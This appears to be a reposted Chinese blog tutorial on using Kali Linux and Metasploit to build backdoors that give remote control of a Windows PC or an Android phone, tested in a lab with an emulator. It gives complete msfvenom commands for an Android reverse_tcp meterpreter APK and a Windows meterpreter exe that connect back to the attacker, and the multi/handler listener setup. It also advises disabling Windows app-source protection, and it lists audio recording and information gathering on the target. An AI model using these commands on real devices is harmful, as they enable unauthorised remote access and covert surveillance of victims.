admin管理员组文章数量:1122847
一、复现环境
Kali平台(Hack):192.168.25.128
靶机:192.168.25.106
Android模拟器(靶机1):192.168.25.106
注意,手机端控制必须使手机和攻击端在同一个网段
二、环境配置二Android模拟器
2.1首先从官网上下载模拟器雷电地址点击打开链接
2.2下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。
问题:你尝试安装的应用不是microsoft验证的应用
解决方法
- 点击左下角“开始”,打开“设置”。
- 选择“应用”。
- 在选择获取应用的位置下面,有四个选项(如下图所示)。像出现上文中的提示,就是选择了【任何来源,但在安装不是Microsoft Store提供的应用之前向我发出警告】。
- 为了避免出现上文中的提示,我们可以选择【任何来源】或者【任何来源,但如果Microsoft Store中有类似的应用,请告诉我】。
- 如果选择【仅 Microsoft Store (推荐)】,那么从非应用商店下载的程序,都是无法运行的,所以尽量不要选择这个选项。
三、生成后门
3.1打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R >222.apk
(生成apk文件)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
解决方法:
在终端输入 “netstat -tulpen”,查看进程端口信息。
命令”fuser -k 端口号/tcp“,删除80端口进程
使用metasploit控制台对模拟器进行攻击
打开msf
电脑端控制:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
安卓手机端控制:
将APK安装到雷电模拟器,启动exploit的时候双击运行MainActivity
获取版本和网络信息
录音操作
版权声明:本文标题:kali生成后门远程控制电脑或手机 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/biancheng/1727714492a1288100.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论